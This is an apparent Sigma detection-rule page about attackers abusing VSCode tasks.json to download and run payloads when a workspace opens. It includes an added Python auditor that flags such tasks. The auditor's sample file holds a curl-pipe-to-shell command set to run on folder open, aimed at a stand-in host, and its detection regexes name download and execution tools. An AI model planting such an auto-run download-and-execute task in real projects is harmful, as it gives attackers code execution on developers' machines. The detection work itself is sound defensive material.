Suspicious Download and Execution Pattern via VSCode Tasks

Rule Info

Name
Suspicious Download and Execution Pattern via VSCode Tasks
Author
Swachchhanda Shrawan Poudel (Nextron Systems)
Description
Detects suspicious patterns where Visual Studio Code (VSCode) spawns processes that both download and execute files, which may indicate abuse of the `tasks.json` configuration for malicious purposes. This technique has been observed in campaigns such as "Contagious Interview," where adversaries leverage VSCode's workspace trust model to execute arbitrary code by embedding malicious commands in `tasks.json`. Attackers may craft or alter `tasks.json` to automatically trigger downloads and execution of payloads when a user opens and trusts a workspace in VSCode, enabling initial access or further compromise.
Date
2026-04-02 00:00:00
Modified
None
Id
8a3b5c7d-2e4f-4a6b-9c8d-1e2f3a4b5c6d
Tags
attack.execution attack.t1059.001 attack.stealth attack.t1218
Type
Nextron Sigma feed only (private)
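
A pre-open check for the behaviour the Description covers, added here as an example (it is not the Nextron rule, whose logic is private, and not code from this page). It parses a workspace's `tasks.json` and reports tasks whose command line both downloads and executes, noting whether the task is configured to run on folder open. The regex heuristics, function names and sample file are assumptions made for this illustration.

```python
import json
import re

_JSONC = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/|,(?=\s*[}\]])', re.S)
# Assumed heuristics for this example; NOT the selections of the private rule.
DOWNLOAD = re.compile(r"\b(curl|wget|invoke-webrequest|iwr|certutil|bitsadmin)\b|https?://", re.I)
EXECUTE = re.compile(r"\|\s*(ba|z)?sh\b|\b(iex|invoke-expression|node|python3?|powershell|pwsh|cmd)\b", re.I)

def load_jsonc(text):
    """tasks.json is JSONC: drop comments and trailing commas, keep strings intact."""
    keep_strings = lambda m: m.group(0) if m.group(0).startswith('"') else ""
    for _ in range(2):  # second pass catches commas that a removed comment was hiding
        text = _JSONC.sub(keep_strings, text)
    return json.loads(text)

def command_lines(task):
    """Yield the effective command line of a task and of its per-OS overrides."""
    word = lambda p: str(p.get("value", "")) if isinstance(p, dict) else str(p)
    scopes = [task] + [task[k] for k in ("windows", "linux", "osx") if isinstance(task.get(k), dict)]
    for scope in scopes:
        parts = [scope.get("command", task.get("command", ""))]
        parts += scope.get("args", task.get("args", []))
        yield " ".join(word(p) for p in parts).strip()

def audit(text):
    """Return (label, runs_on_folder_open, command) for download-and-execute tasks."""
    findings = []
    for task in load_jsonc(text).get("tasks", []):
        auto = task.get("runOptions", {}).get("runOn") == "folderOpen"
        for line in command_lines(task):
            if DOWNLOAD.search(line) and EXECUTE.search(line):
                findings.append((task.get("label", "<unlabelled>"), auto, line))
    return findings

# Constructed sample workspace file (example.invalid is a reserved, non-resolving name).
SAMPLE = r'''{
  // constructed sample, not taken from a real repository
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm", "args": ["run", "build"] },
    { "label": "env-setup", "type": "shell",
      "command": "curl -s https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" }, },
  ]
}'''

if __name__ == "__main__":
    for label, auto, line in audit(SAMPLE):
        print(f"[{'auto-run' if auto else 'manual'}] {label}: {line}")
```

Findings flagged as running on folder open deserve review before the workspace is trusted; the heuristics are deliberately broad and will need tuning against legitimate build tasks.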

Rule History